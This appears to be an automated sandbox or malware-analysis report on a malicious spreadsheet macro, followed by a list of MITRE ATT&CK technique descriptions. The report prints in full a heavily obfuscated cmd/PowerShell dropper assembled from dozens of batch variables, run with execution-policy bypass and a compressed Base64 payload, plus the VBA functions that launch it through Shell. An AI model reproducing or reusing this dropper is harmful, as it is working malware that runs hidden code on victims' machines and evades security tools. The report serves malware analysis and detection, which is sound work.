"set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \""""{3}{1}{0}{4}{2}\"""" -f 'nta','ese',( \""""&&set k2G=Fcgjp5&&set y41=RGJGLLoPE1&&set dAs=49}{7}{51}{5}{2&&set sBW=uCbCLFi5BuJ&&set xZ=bl5RXj&&set FD=1CerMt7ONo0c','q','oSU&&set i9PL=;.&&set sD=6hkJYL&&set 96f=S"""" )^^^^^^^^^^^^^^^\|.(""""{0}{1}{&&set fH=tiONP&&set JF=ao&&set RO=YlN&&set GrLY=zZ','&&set yMaD=o5&&set XeL=}{1&&set L4=Ui&&set Yu=xW4i57aY&&set AG=js5R6Eb08Ls3','bxS&&set gS=ZL89PzDtI&&set 2JBb=14}{&&set qpO=-w 1 -nopR -sta -ExEcU&&set S1=d1KdrFAH&&set 5c=RN3RKBBV9ZXsjbAx8rLF&&set VZA=Vy7l4Jxf&&set M93h=gb&&set po=oL &&set i8=-f 'InG','TOS','Tr').\""""IN`VOkE\""""(&&set 7wv=u&&set aLve='),'Pr','t'&&set rdfX=43&&set ld=6}&&set 97tN=e8&&set JNvz=7+F','xvUjxS&&set Pj=M&&set J6=W&&set MTk=4&&set XjK=7ooYCqFO5CUzUMaaw92FK','WF&&set fWO4=OdQrtlwhW0wsc7/TRio00qZdd5&&set RLj=bR&&set mC=y3ANhm&&set 5m=E5C3FlV6&&set ibgE=FAmCFN0Ol&&"
"set quG=nG""""((""""{22}{44}{11}&&set 79=P&&set pIA=2Edc7LZcTpp&&set QEdm=D4Xj&&set vrWE= ${vErb`o`sE&&set WMP='&&set mOv=25}{21}{28}{37}{40&&set kEQz='&&set JaD=qasUyJ1dKYY+V0F&&set fV=.tex""t.ENc""Od""ING]::""""AS`C&&set Pb={1}\""""&&set LHM=v&&set pw8t=GaxGO/xX1CYmTXt&&set 7y=I7&&set XT=s&&set yV=uo&&set QD=i6SO&&set iWT=]::""""F`R`o`MBAse`64Stri&&set qrQ=zfPUPs5JaAFW&&set Dy=0/e&&set 4NX=','jHSOn&&set g3fn=`oE`Nd""""( )}&&set RT=xE','C'&&set jB={0}{47}{33}{30}{1}{34}{50}{4}{46}{31&&set 2su=PlkIRSG','fSl+lb0CYnloyxTlthMl6&&set rC=}{29}{9}{&&set 8Y=4&&set 5v=hCdAfH4pl9',&&set xd= )[1,3] &&set 4Y=AefjFQblNcpE4lg&&set 8lU=','ejG/pwf4EiFPQC3Y&&set Oo=yo2dMx&&set WxJY=+ 'x'-JoiN'' )( ( [S&&set Mcz=L&&set Wyh=QbYcFAGfmhTt/WAKoZjvt5XsB/HY&&set 6p=Xa/O6smRbnn','32O&&set 3O7I=LkcB'&&set JtM=LdXzlH5AiqodnkybHbbbrH&&set LK='0Lv6L&&set pD=10}"""" -f '&&set gqy= -f 'eX','t','eTt' )).\&&set 6LrC=Ystem.w&&set xQV='g',( \""""{2}"
"{0}{1}\""""&&set 9CU='xL1w032cbz&&set Y27=LRcf487TKv0QauRlD9be1uKl&&set DAk=}{48&&set k1W=T&&set GZJ1=inD&&set oh= IO.`&&set XB=a6P&&set kG=6f&&set fUI=bMjUo673DHHJu8i','&&set m2=24}{2}{42}{19}{45}{&&set K7=).\""""inVO`kE\""""(' ' &&set OrFY=GNTS1+BpbbHL1tF3iYVG&&set PH=cM""dBAWkCsFa','LKyC','e0p+w0Bofaf/Lyle2u7B3WVDcyxF4zTu6pwrh&&set wZHB=J&&set MVT3=Brmg4ISxL&&set 21=}{35}&&set 8Ne=+sR8Ei7goBM&&set gi1h=^^^^^^^\| ^^^^^^^^^^^^^^^&(""""{0}{1}""""-f 'f','ORea&&set I3ae=','dHKk2y&&set f8N1=s/pjm5QG+Uw','As&&set RfN=oV','o','oEET',&&set dnk={&&set okc=hdO0fMc1&&set f2=A&&set kNPC=Lyj0hSicUL1suvPnX&&set AqH=4/&&set 8B=\""""{2}{&&set At=','e','W-&&set szN=ZEGBZ8L/Vs','Nuj8jM2MH','BlogkZxleJ&&set Vn=.Clipbo&&set S9=ard]::(&&set 2h=IYQSiCG&&set iL=L . (&&set D9nJ=""""i`N`V&&set DA= &&set 8zYQ=c&&set oc=H1&&set aEs=hoNLSo&&set gH81=,'&&set ivp=ftK8UuZ5LdqmBaILN&&set ak=IC&&set wAIB=fPnVU0HoT+&&set MNA=E','tN&&set m4={2}{0}{&&set Rd3=wJ'&&set WYi=aFd&&set Fj"
"wh=N.C&&set oD=`AteSTrE`AM( [SYSt&&set SVbw=ALYNhELyiaA1M1&&set aJ=34]+'x')( .(""""{1}{0}{&&set Ms1U=by&&set so1T=Pre&&set XVj=w==','1K&&set xlCT=s2DS//e&&set LU0G=B&&set oWS=HNugXUPjnVoGb3bE7e','XWc4t&&set gSCj=D&&set Yzur= &&set opQ=),[sYsTe&&set OdW=oWS.CL""iPbo""aRd]::(&&set Kxc6=Pc+BeNlKIqoxmnaJ&&set ay=NvjPN2m&&set WF=qhsxvF6ggHSAvv&&set 4KVu=( ${pS`h`OmE}[4]&&set 8v1=oKp&&set QMEZ={38}{41}{15}{13}{27&&set v1=0}{1}\"""" -f 'e&&set qid=jqwa6Bj','oZEH81Es7&&set 4E0y= [syStEM&&set lwe=40+HZpXFA&&set 7ut= \""""{2}{0}{1}\"""" &&set F24u=K&&set GWCJ=ver&&set Mh=9HhxiqChyuK&&set ly=A&&set Rn='neW-','jECT') IO.CO&&set Wy=qiY2Jya4B5oLmH&&set lQ=2}&&set Lz=,'bE&&set Sye4=B&&set xzU='GDL&&set jkew=zEJFZG','&&set 7FGL=,'Iz&&set lskm=EcH""O/^^^^^^^^^^^^^^^&&&set wyNR=NS1blIorpYOOdplN65rKj&&set Rpm=fA3bUz/Phr&&set Qe=em.io.MEM""orYSTREam][sYSte&&set PN=ES&&set 7GBY=BOZV5&&set x58A=efrqnAUABd+h0nPdJvf7SH&&set pN0=xnma7xH&&s"
"et xvz=\"""" &&set ivU={&&set WIUk= ^^^\|cLi""P^^^&^^^&cM""d /C pow""eRS&&set K90z=B&&set x0=z+mg7N&&set 2PKZ=n&&set 8o=Xv2h6+XDuwrB2UzD&&set xI=)&&set vl1D=kFtFBYL7hXXHaH&&set JxP5=2NIa13B2VYlABNEyPGpc&&set LG=DdlpSoWp+ZSu2&&set QI=3}{23}{17&&set 4KG1=3JlvvCkqSn&&set w8PF=L/&&set AR= -f 'T','ext' ),'S'&&set Qm=/2+p/&&set fvVc=et&&set qe6u=""""-f 'oB',&&set JH3p=CMioW+&&set rxku=X&&set gED=5eVNRxBB&&set aS=P`REf&&set SA=E`ADER( ${&&set xnM= ( &&set g274=f8Zz+ZY201PTp&&set OyI=m.iO.COm&&set lVa=pO&&set LoKD= \""""{0}{1}\"""" -f&&set SzR4=}{16}{36}&&set OWD=TLR',&&set Dgc=qmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+&&set s06=s0uJ8LMG&&set G6=`ereNce}.( \""""&&set g1=5kPuHoeb2d4V2DswOgiwNQPKP','pxXg&&set VO=}{12}{&&set MI4=oKe&&set 2w=e4UYmTa','iE5d4E&&set X2=11','PFd/&&set i3qb=nmSUbRKm/4PD&&set Ga0p=c','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn'&&set ogN=/&&set GtO={32}{2&&set ot=m.COn&&set VUnC=dVZtc6JIEP4rXVu5CIsSQKNBKx/&&set Di7W=,'5T8EDISyqRylxGVJpP64&&se"
"t Kpm=)&&set iX=tuu&&set AX0i=,'sjp6c&&set 6Ay=1}\""""-f 'o','re','ionC&&set P7=Ch'&&set vTb=eH0'&&set MEn9=0}{8}{&&set wJzc=_},&&set gV=+VJA&&set gKQ=GFy3gJKWW&&set yD=H&&set FC0k=+${PS&&set Llu=39}{&&set jyOe=BYPaSS -NOnI &&set 7g=Q&&set RqJz=eLl&&set lW8=2}"""" -f 'Fo&&set kIO=t2pO',&&set rcp={1}{2}{0}&&set YB=Ws+KLOl&&set A0yL=,&&set MPf=K1dUB4BJsmJlTTDKH9Nv&&set Oswb=UG&&set xDr=,&&set Rn1P=1J7&&set gSPy='SISLxsB+i0VNzgIu9Pt7eBk&&set WJ=QG8twkm+pRZlcthuqcLf&&set 62=E`sSION`.`deFL&&set Wp=){${_}.""""&&set qjC=IRS&&set rSoi=m&&set 3Wz=D26&&set qkN=U&&set 85wf=DiHo0&&set 2U=sTrEA`MR&&set O8N='K5AY3vQIdfy+&&set ax=5Zml5EM9PfzlFGjG&&set rMQ=tw','oyn','9F','IKgTW','CVhh6q5k76fS&&set lG2=sZyTl&&call set QJi=%lskm%%4KVu%%FC0k%%MZ%%aJ%%lQ%%qe6u%%Rn%%fXO9%%62%%oD%%Qe%%ot%%GWCJ%%k1W%%iWT%%quG%%jB%%XeL%%FI%%GtO%%ld%%QMEZ%%DAk%%SzR4%%ivU%%Llu%%dAs%%MEn9%%QI%%21%%dnk%%2JBb%%mOv%%VO%%m2%%rdfX%%rC%%pD%%kIO%%9CU%%PF%%Ga0p%%Lz%%dn%%gSPy%%8Ne%%M76%%5v"
"%%kmP%%O8N%%Rpm%%Kxc6%%ibgE%%F24u%%Ms1U%%97tN%%y41%%md%%LU0G%%Rd3%%AX0i%%X2%%w8PF%%qkN%%xZ%%iX%%OWD%%LK%%XVj%%Dgc%%x58A%%JtM%%Wyh%%qrQ%%WMP%%Di7W%%OJo%%5c%%rSoi%%wyNR%%Mh%%2h%%3O7I%%gH81%%Oswb%%L4%%mti%%Y27%%sBW%%JNvz%%i3qb%%MTk%%79%%7g%%jkew%%JH3p%%I3ae%%sD%%RO%%JF%%Mcz%%Wy%%GrLY%%qjC%%8v1%%4Y%%KGUu%%kG%%yMaD%%8zYQ%%a3%%du4k%%JxP5%%ksNm%%6In%%x0%%YB%%ly%%XT%%ay%%Sye4%%jvc%%fWO4%%pw8t%%XB%%ak%%gV%%kNPC%%f8N1%%gSCj%%dq%%oc%%qXy%%gKQ%%8Y%%6x%%OrFY%%g1%%fUI%%VUnC%%Jx19%%ivp%%85wf%%s06%%Vkgt%%gED%%ax%%M93h%%Qm%%okc%%AG%%W39h%%2w%%4KG1%%fvVc%%87kx%%wZHB%%rxku%%LG%%WJ%%7GBY%%MPf%%lVa%%PH%%4NX%%oWS%%8o%%VZA%%Yu%%gS%%k2G%%Pj%%MNA%%sGDZ%%FD%%5m%%Rn1P%%J6%%RfN%%kEQz%%2su%%pIA%%g9R%%A0yL%%lM%%LHM%%7y%%pN0%%f2%%3kP%%Oo%%SVbw%%WF%%RT%%xDr%%xzU%%AqH%%wFhV%%xlCT%%MVT3%%6p%%mC%%WYi%%qid%%K90z%%QD%%RLj%%8lU%%wAIB%%rMQ%%QEdm%%vl1D%%7wv%%2PKZ%%JaD%%XjK%%vTb%%7FGL%%g274%%lwe%%szN%%aEs%%lG2%%fQN%%S1%%ogN%%3Wz%%yV%%Dy%%qK%%opQ%%OyI%%so1T%%34f%%Fjwh%%7T%%PN%%96f%%lW8%%AXSR%%At%%vJI"
"Z%%oh%%2U%%SA%%wJzc%%4E0y%%fV%%xCZA%%gi1h%%P7%%Wp%%p5%%g3fn%%Kpm%%WIUk%%yD%%RqJz%%Yzur%%qpO%%fH%%po%%jyOe%%q3FQ%%iL%%7ut%%Igd%%Op%%3mr%%wpf%%m4%%6Ay%%aLve%%DA%%xI%%i9PL%%xnM%%vrWE%%6jA%%aS%%G6%%rcp%%xvz%%i8%%xd%%WxJY%%6LrC%%GZJ1%%OdW%%LoKD%%xQV%%gqy%%D9nJ%%MI4%%54K%%M3hU%%Vn%%S9%%8B%%v1%%J3%%Pb%%AR%%K7%%KcOP%&&C""md /C"" %QJi:""""=!7w:~1!%"""

Line	Instruction	Meta Information
31	Function MasterFunction()
32	am2 = "set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \""""{3}{1}{0}{4}{2}\"""" -f 'nta','ese',( \""""&&set k2G=Fcgjp5&&set y41=RGJGLLoPE1&&set dAs=49}{7}{51}{5}{2&&set sBW=uCbCLFi5BuJ&&set xZ=bl5RXj&&set FD=1CerMt7ONo0c','q','oSU&&set i9PL=;.&&set sD=6hkJYL&&set 96f=S"""" )^^^^^^^^^^^^^^^\|.(""""{0}{1}{&&set fH=tiONP&&set JF=ao&&set RO=YlN&&set GrLY=zZ','&&set yMaD=o5&&set XeL=}{1&&set L4=Ui&&set Yu=xW4i57aY&&set AG=js5R6Eb08Ls3','bxS&&set gS=ZL89PzDtI&&set 2JBb=14}{&&set qpO=-w 1 -nopR -sta -ExEcU&&set S1=d1KdrFAH&&set 5c=RN3RKBBV9ZXsjbAx8rLF&&set VZA=Vy7l4Jxf&&set M93h=gb&&set po=oL &&set i8=-f 'InG','TOS','Tr').\""""IN`VOkE\""""(&&set 7wv=u&&set aLve='),'Pr','t'&&set rdfX=43&&set ld=6}&&set 97tN=e8&&set JNvz=7+F','xvUjxS&&set Pj=M&&set J6=W&&set MTk=4&&set XjK=7ooYCqFO5CUzUMaaw92FK','WF&&set fWO4=OdQrtlwhW0wsc7/TRio00qZdd5&&set RLj=bR&&set mC=y3ANhm&&set 5m=E5C3FlV6&&set ibgE=FAmCFN0Ol&&"	executed
33	am3 = "set quG=nG""""((""""{22}{44}{11}&&set 79=P&&set pIA=2Edc7LZcTpp&&set QEdm=D4Xj&&set vrWE= ${vErb`o`sE&&set WMP='&&set mOv=25}{21}{28}{37}{40&&set kEQz='&&set JaD=qasUyJ1dKYY+V0F&&set fV=.tex" + "t.ENc" + "Od" + "ING]::""""AS`C&&set Pb={1}\""""&&set LHM=v&&set pw8t=GaxGO/xX1CYmTXt&&set 7y=I7&&set XT=s&&set yV=uo&&set QD=i6SO&&set iWT=]::""""F`R`o`MBAse`64Stri&&set qrQ=zfPUPs5JaAFW&&set Dy=0/e&&set 4NX=','jHSOn&&set g3fn=`oE`Nd""""( )}&&set RT=xE','C'&&set jB={0}{47}{33}{30}{1}{34}{50}{4}{46}{31&&set 2su=PlkIRSG','fSl+lb0CYnloyxTlthMl6&&set rC=}{29}{9}{&&set 8Y=4&&set 5v=hCdAfH4pl9',&&set xd= )[1,3] &&set 4Y=AefjFQblNcpE4lg&&set 8lU=','ejG/pwf4EiFPQC3Y&&set Oo=yo2dMx&&set WxJY=+ 'x'-JoiN'' )( ( [S&&set Mcz=L&&set Wyh=QbYcFAGfmhTt/WAKoZjvt5XsB/HY&&set 6p=Xa/O6smRbnn','32O&&set 3O7I=LkcB'&&set JtM=LdXzlH5AiqodnkybHbbbrH&&set LK='0Lv6L&&set pD=10}"""" -f '&&set gqy= -f 'eX','t','eTt' )).\&&set 6LrC=Ystem.w&&set xQV='g',( \""""{2}"
34	am4 = "{0}{1}\""""&&set 9CU='xL1w032cbz&&set Y27=LRcf487TKv0QauRlD9be1uKl&&set DAk=}{48&&set k1W=T&&set GZJ1=inD&&set oh= IO.`&&set XB=a6P&&set kG=6f&&set fUI=bMjUo673DHHJu8i','&&set m2=24}{2}{42}{19}{45}{&&set K7=).\""""inVO`kE\""""(' ' &&set OrFY=GNTS1+BpbbHL1tF3iYVG&&set PH=cM" + "dBAWkCsFa','LKyC','e0p+w0Bofaf/Lyle2u7B3WVDcyxF4zTu6pwrh&&set wZHB=J&&set MVT3=Brmg4ISxL&&set 21=}{35}&&set 8Ne=+sR8Ei7goBM&&set gi1h=^^^^^^^\| ^^^^^^^^^^^^^^^&(""""{0}{1}""""-f 'f','ORea&&set I3ae=','dHKk2y&&set f8N1=s/pjm5QG+Uw','As&&set RfN=oV','o','oEET',&&set dnk={&&set okc=hdO0fMc1&&set f2=A&&set kNPC=Lyj0hSicUL1suvPnX&&set AqH=4/&&set 8B=\""""{2}{&&set At=','e','W-&&set szN=ZEGBZ8L/Vs','Nuj8jM2MH','BlogkZxleJ&&set Vn=.Clipbo&&set S9=ard]::(&&set 2h=IYQSiCG&&set iL=L . (&&set D9nJ=""""i`N`V&&set DA= &&set 8zYQ=c&&set oc=H1&&set aEs=hoNLSo&&set gH81=,'&&set ivp=ftK8UuZ5LdqmBaILN&&set ak=IC&&set wAIB=fPnVU0HoT+&&set MNA=E','tN&&set m4={2}{0}{&&set Rd3=wJ'&&set WYi=aFd&&set Fj"
35	am5 = "wh=N.C&&set oD=`AteSTrE`AM( [SYSt&&set SVbw=ALYNhELyiaA1M1&&set aJ=34]+'x')( .(""""{1}{0}{&&set Ms1U=by&&set so1T=Pre&&set XVj=w==','1K&&set xlCT=s2DS//e&&set LU0G=B&&set oWS=HNugXUPjnVoGb3bE7e','XWc4t&&set gSCj=D&&set Yzur= &&set opQ=),[sYsTe&&set OdW=oWS.CL" + "iPbo" + "aRd]::(&&set Kxc6=Pc+BeNlKIqoxmnaJ&&set ay=NvjPN2m&&set WF=qhsxvF6ggHSAvv&&set 4KVu=( ${pS`h`OmE}[4]&&set 8v1=oKp&&set QMEZ={38}{41}{15}{13}{27&&set v1=0}{1}\"""" -f 'e&&set qid=jqwa6Bj','oZEH81Es7&&set 4E0y= [syStEM&&set lwe=40+HZpXFA&&set 7ut= \""""{2}{0}{1}\"""" &&set F24u=K&&set GWCJ=ver&&set Mh=9HhxiqChyuK&&set ly=A&&set Rn='neW-','jECT') IO.CO&&set Wy=qiY2Jya4B5oLmH&&set lQ=2}&&set Lz=,'bE&&set Sye4=B&&set xzU='GDL&&set jkew=zEJFZG','&&set 7FGL=,'Iz&&set lskm=EcH" + "O/^^^^^^^^^^^^^^^&&&set wyNR=NS1blIorpYOOdplN65rKj&&set Rpm=fA3bUz/Phr&&set Qe=em.io.MEM" + "orYSTREam][sYSte&&set PN=ES&&set 7GBY=BOZV5&&set x58A=efrqnAUABd+h0nPdJvf7SH&&set pN0=xnma7xH&&s"
36	am6 = "et xvz=\"""" &&set ivU={&&set WIUk= ^^^\|cLi" + "P^^^&^^^&cM" + "d /C pow" + "eRS&&set K90z=B&&set x0=z+mg7N&&set 2PKZ=n&&set 8o=Xv2h6+XDuwrB2UzD&&set xI=)&&set vl1D=kFtFBYL7hXXHaH&&set JxP5=2NIa13B2VYlABNEyPGpc&&set LG=DdlpSoWp+ZSu2&&set QI=3}{23}{17&&set 4KG1=3JlvvCkqSn&&set w8PF=L/&&set AR= -f 'T','ext' ),'S'&&set Qm=/2+p/&&set fvVc=et&&set qe6u=""""-f 'oB',&&set JH3p=CMioW+&&set rxku=X&&set gED=5eVNRxBB&&set aS=P`REf&&set SA=E`ADER( ${&&set xnM= ( &&set g274=f8Zz+ZY201PTp&&set OyI=m.iO.COm&&set lVa=pO&&set LoKD= \""""{0}{1}\"""" -f&&set SzR4=}{16}{36}&&set OWD=TLR',&&set Dgc=qmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+&&set s06=s0uJ8LMG&&set G6=`ereNce}.( \""""&&set g1=5kPuHoeb2d4V2DswOgiwNQPKP','pxXg&&set VO=}{12}{&&set MI4=oKe&&set 2w=e4UYmTa','iE5d4E&&set X2=11','PFd/&&set i3qb=nmSUbRKm/4PD&&set Ga0p=c','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn'&&set ogN=/&&set GtO={32}{2&&set ot=m.COn&&set VUnC=dVZtc6JIEP4rXVu5CIsSQKNBKx/&&set Di7W=,'5T8EDISyqRylxGVJpP64&&se"
37	am7 = "t Kpm=)&&set iX=tuu&&set AX0i=,'sjp6c&&set 6Ay=1}\""""-f 'o','re','ionC&&set P7=Ch'&&set vTb=eH0'&&set MEn9=0}{8}{&&set wJzc=_},&&set gV=+VJA&&set gKQ=GFy3gJKWW&&set yD=H&&set FC0k=+${PS&&set Llu=39}{&&set jyOe=BYPaSS -NOnI &&set 7g=Q&&set RqJz=eLl&&set lW8=2}"""" -f 'Fo&&set kIO=t2pO',&&set rcp={1}{2}{0}&&set YB=Ws+KLOl&&set A0yL=,&&set MPf=K1dUB4BJsmJlTTDKH9Nv&&set Oswb=UG&&set xDr=,&&set Rn1P=1J7&&set gSPy='SISLxsB+i0VNzgIu9Pt7eBk&&set WJ=QG8twkm+pRZlcthuqcLf&&set 62=E`sSION`.`deFL&&set Wp=){${_}.""""&&set qjC=IRS&&set rSoi=m&&set 3Wz=D26&&set qkN=U&&set 85wf=DiHo0&&set 2U=sTrEA`MR&&set O8N='K5AY3vQIdfy+&&set ax=5Zml5EM9PfzlFGjG&&set rMQ=tw','oyn','9F','IKgTW','CVhh6q5k76fS&&set lG2=sZyTl&&call set QJi=%lskm%%4KVu%%FC0k%%MZ%%aJ%%lQ%%qe6u%%Rn%%fXO9%%62%%oD%%Qe%%ot%%GWCJ%%k1W%%iWT%%quG%%jB%%XeL%%FI%%GtO%%ld%%QMEZ%%DAk%%SzR4%%ivU%%Llu%%dAs%%MEn9%%QI%%21%%dnk%%2JBb%%mOv%%VO%%m2%%rdfX%%rC%%pD%%kIO%%9CU%%PF%%Ga0p%%Lz%%dn%%gSPy%%8Ne%%M76%%5v"
38	am8 = "%%kmP%%O8N%%Rpm%%Kxc6%%ibgE%%F24u%%Ms1U%%97tN%%y41%%md%%LU0G%%Rd3%%AX0i%%X2%%w8PF%%qkN%%xZ%%iX%%OWD%%LK%%XVj%%Dgc%%x58A%%JtM%%Wyh%%qrQ%%WMP%%Di7W%%OJo%%5c%%rSoi%%wyNR%%Mh%%2h%%3O7I%%gH81%%Oswb%%L4%%mti%%Y27%%sBW%%JNvz%%i3qb%%MTk%%79%%7g%%jkew%%JH3p%%I3ae%%sD%%RO%%JF%%Mcz%%Wy%%GrLY%%qjC%%8v1%%4Y%%KGUu%%kG%%yMaD%%8zYQ%%a3%%du4k%%JxP5%%ksNm%%6In%%x0%%YB%%ly%%XT%%ay%%Sye4%%jvc%%fWO4%%pw8t%%XB%%ak%%gV%%kNPC%%f8N1%%gSCj%%dq%%oc%%qXy%%gKQ%%8Y%%6x%%OrFY%%g1%%fUI%%VUnC%%Jx19%%ivp%%85wf%%s06%%Vkgt%%gED%%ax%%M93h%%Qm%%okc%%AG%%W39h%%2w%%4KG1%%fvVc%%87kx%%wZHB%%rxku%%LG%%WJ%%7GBY%%MPf%%lVa%%PH%%4NX%%oWS%%8o%%VZA%%Yu%%gS%%k2G%%Pj%%MNA%%sGDZ%%FD%%5m%%Rn1P%%J6%%RfN%%kEQz%%2su%%pIA%%g9R%%A0yL%%lM%%LHM%%7y%%pN0%%f2%%3kP%%Oo%%SVbw%%WF%%RT%%xDr%%xzU%%AqH%%wFhV%%xlCT%%MVT3%%6p%%mC%%WYi%%qid%%K90z%%QD%%RLj%%8lU%%wAIB%%rMQ%%QEdm%%vl1D%%7wv%%2PKZ%%JaD%%XjK%%vTb%%7FGL%%g274%%lwe%%szN%%aEs%%lG2%%fQN%%S1%%ogN%%3Wz%%yV%%Dy%%qK%%opQ%%OyI%%so1T%%34f%%Fjwh%%7T%%PN%%96f%%lW8%%AXSR%%At%%vJI"
39	am9 = "Z%%oh%%2U%%SA%%wJzc%%4E0y%%fV%%xCZA%%gi1h%%P7%%Wp%%p5%%g3fn%%Kpm%%WIUk%%yD%%RqJz%%Yzur%%qpO%%fH%%po%%jyOe%%q3FQ%%iL%%7ut%%Igd%%Op%%3mr%%wpf%%m4%%6Ay%%aLve%%DA%%xI%%i9PL%%xnM%%vrWE%%6jA%%aS%%G6%%rcp%%xvz%%i8%%xd%%WxJY%%6LrC%%GZJ1%%OdW%%LoKD%%xQV%%gqy%%D9nJ%%MI4%%54K%%M3hU%%Vn%%S9%%8B%%v1%%J3%%Pb%%AR%%K7%%KcOP%&&C" + "md /C" + " %QJi:""""=!7w:~1!%"""
40	MasterFunction = TerSS & am2 & am3 & am4 + am5 & am6 + am7 & am8 + am9
41	End Function

Subroutine Sheet3A, APIs: 1, Strings: 0, Number of lines: 3, Relevance: 1.253

APIs	Meta Information
Shell#

Line	Instruction	Meta Information
14	Sub Sheet3A()
15	Visiblec = Shell#(MasterFunction, 500000000000# - 500000000000#)	Shell# executed
16	End Sub

Function tegad, APIs: 0, Strings: 1, Number of lines: 3, Relevance: 1.253

Strings	Decrypted Strings
"0yJa+CgVQ64wlYgUsz&&set qXy=V""B&&s""et 87kx=oJOLevLKG&&se""t mt""i=6&&s""et md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&se""t W39h=11Hy&&se""t fQN=oM2&&se""t Igd=-f'y""p','e""',( \""""{1""}{""&&se""t qK=Ro5A5SnpE3C/') &&se""t vJIZ=oBj""EC""T') &&set Vkgt=ki6','U+ZEre4WJW&&set A""XSR=','R','ea"

Line	Instruction	Meta Information
17	Function tegad()
18	tegad = "0yJa+CgVQ64wlYgUsz&&set qXy=V" + "B&&s" + "et 87kx=oJOLevLKG&&se" + "t mt" + "i=6&&s" + "et md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&se" + "t W39h=11Hy&&se" + "t fQN=oM2&&se" + "t Igd=-f'y" + "p','e" + "',( \""""{1" + "}{" + "&&se" + "t qK=Ro5A5SnpE3C/') &&se" + "t vJIZ=oBj" + "EC" + "T') &&set Vkgt=ki6','U+ZEre4WJW&&set A" + "XSR=','R','ea"	executed
19	End Function

Reset < >

Description:	Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. (Citation: Wikipedia Command-Line Interface) One example command-line interface on Windows systems is cmd , which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task ).
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.
Tactics:	Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process Monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process Monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.
Tactics:	Defense Evasion
Data Sources:	API monitoring, Anti-virus, File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, Scripting , PowerShell , or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process Monitoring, Process command-line parameters
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process Monitoring, Process command-line parameters, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
